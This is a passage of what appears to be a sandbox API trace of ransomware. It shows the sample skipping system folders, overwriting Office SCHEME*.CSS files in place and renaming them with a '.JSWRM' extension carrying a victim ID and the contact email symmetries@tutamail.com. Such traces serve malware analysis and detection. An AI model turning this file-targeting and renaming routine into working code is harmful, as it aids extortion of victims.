[0117.058] lstrcmpiW (lpString1="SCHEME14.CSS", lpString2="recovery") returned 1 [0117.058] lstrcmpiW (lpString1="SCHEME14.CSS", lpString2="perflogs") returned 1 [0117.058] lstrcmpiW (lpString1="SCHEME14.CSS", lpString2="documents and settings") returned 1 [0117.058] lstrcmpiW (lpString1="SCHEME14.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.058] lstrcmpiW (lpString1="SCHEME14.CSS", lpString2="system volume information") returned -1 [0117.058] lstrcmpiW (lpString1="SCHEME14.CSS", lpString2="msocache") returned 1 [0117.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0117.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME14.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME14.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME14.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0117.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0117.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME14.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME14.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME14.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0117.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0117.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0117.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0117.059] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME14.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme14.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.059] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=128460) returned 1 [0117.059] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f5c0) returned 0x24c1d0 [0117.059] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1f5c0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1f5c0, lpOverlapped=0x0) returned 1 [0117.072] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.072] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1f5c0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1f5c0, lpOverlapped=0x0) returned 1 [0117.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.073] CloseHandle (hObject=0x314) returned 1 [0117.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0117.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0117.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0117.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0117.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0117.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0117.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0117.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0117.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0117.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0117.073] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME14.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme14.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME14.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme14.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0117.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0117.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0117.074] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xacf29e7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xacf29e7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e094, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME15.CSS", cAlternateFileName="")) returned 1 [0117.074] lstrcmpiW (lpString1="SCHEME15.CSS", lpString2=".") returned 1 [0117.074] lstrcmpiW (lpString1="SCHEME15.CSS", lpString2="..") returned 1 [0117.074] lstrcmpiW (lpString1="SCHEME15.CSS", lpString2="...") returned 1 [0117.074] lstrcmpiW (lpString1="SCHEME15.CSS", lpString2="windows") returned -1 [0117.074] lstrcmpiW (lpString1="SCHEME15.CSS", lpString2="recovery") returned 1 [0117.074] lstrcmpiW (lpString1="SCHEME15.CSS", lpString2="perflogs") returned 1 [0117.074] lstrcmpiW (lpString1="SCHEME15.CSS", lpString2="documents and settings") returned 1 [0117.074] lstrcmpiW (lpString1="SCHEME15.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.074] lstrcmpiW (lpString1="SCHEME15.CSS", lpString2="system volume information") returned -1 [0117.074] lstrcmpiW (lpString1="SCHEME15.CSS", lpString2="msocache") returned 1 [0117.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0117.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME15.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME15.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME15.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0117.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0117.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME15.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME15.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME15.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0117.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0117.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0117.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0117.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME15.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme15.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.077] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=123028) returned 1 [0117.077] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e090) returned 0x24c1d0 [0117.077] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1e090, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1e090, lpOverlapped=0x0) returned 1 [0117.087] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.087] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1e090, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1e090, lpOverlapped=0x0) returned 1 [0117.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.088] CloseHandle (hObject=0x314) returned 1 [0117.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0117.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0117.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0117.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0117.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0117.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0117.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0117.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0117.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0117.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0117.088] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME15.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme15.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME15.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme15.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0117.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0117.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0117.089] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab7525c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab7525c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab7525c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f822, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME16.CSS", cAlternateFileName="")) returned 1 [0117.089] lstrcmpiW (lpString1="SCHEME16.CSS", lpString2=".") returned 1 [0117.089] lstrcmpiW (lpString1="SCHEME16.CSS", lpString2="..") returned 1 [0117.089] lstrcmpiW (lpString1="SCHEME16.CSS", lpString2="...") returned 1 [0117.089] lstrcmpiW (lpString1="SCHEME16.CSS", lpString2="windows") returned -1 [0117.089] lstrcmpiW (lpString1="SCHEME16.CSS", lpString2="recovery") returned 1 [0117.089] lstrcmpiW (lpString1="SCHEME16.CSS", lpString2="perflogs") returned 1 [0117.089] lstrcmpiW (lpString1="SCHEME16.CSS", lpString2="documents and settings") returned 1 [0117.089] lstrcmpiW (lpString1="SCHEME16.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.089] lstrcmpiW (lpString1="SCHEME16.CSS", lpString2="system volume information") returned -1 [0117.089] lstrcmpiW (lpString1="SCHEME16.CSS", lpString2="msocache") returned 1 [0117.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0117.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME16.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME16.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME16.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0117.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0117.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME16.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME16.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME16.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0117.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0117.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0117.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0117.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME16.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme16.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.093] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=129058) returned 1 [0117.093] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f820) returned 0x24c1d0 [0117.093] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1f820, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1f820, lpOverlapped=0x0) returned 1 [0117.107] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.107] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1f820, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1f820, lpOverlapped=0x0) returned 1 [0117.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.107] CloseHandle (hObject=0x314) returned 1 [0117.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0117.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0117.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0117.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0117.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0117.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0117.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0117.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0117.108] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME16.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme16.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME16.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme16.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0117.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0117.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0117.109] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab7525c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab7525c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab7525c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1eada, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME17.CSS", cAlternateFileName="")) returned 1 [0117.109] lstrcmpiW (lpString1="SCHEME17.CSS", lpString2=".") returned 1 [0117.109] lstrcmpiW (lpString1="SCHEME17.CSS", lpString2="..") returned 1 [0117.109] lstrcmpiW (lpString1="SCHEME17.CSS", lpString2="...") returned 1 [0117.109] lstrcmpiW (lpString1="SCHEME17.CSS", lpString2="windows") returned -1 [0117.109] lstrcmpiW (lpString1="SCHEME17.CSS", lpString2="recovery") returned 1 [0117.109] lstrcmpiW (lpString1="SCHEME17.CSS", lpString2="perflogs") returned 1 [0117.109] lstrcmpiW (lpString1="SCHEME17.CSS", lpString2="documents and settings") returned 1 [0117.109] lstrcmpiW (lpString1="SCHEME17.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.110] lstrcmpiW (lpString1="SCHEME17.CSS", lpString2="system volume information") returned -1 [0117.110] lstrcmpiW (lpString1="SCHEME17.CSS", lpString2="msocache") returned 1 [0117.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0117.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME17.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME17.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME17.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0117.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0117.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME17.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME17.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, 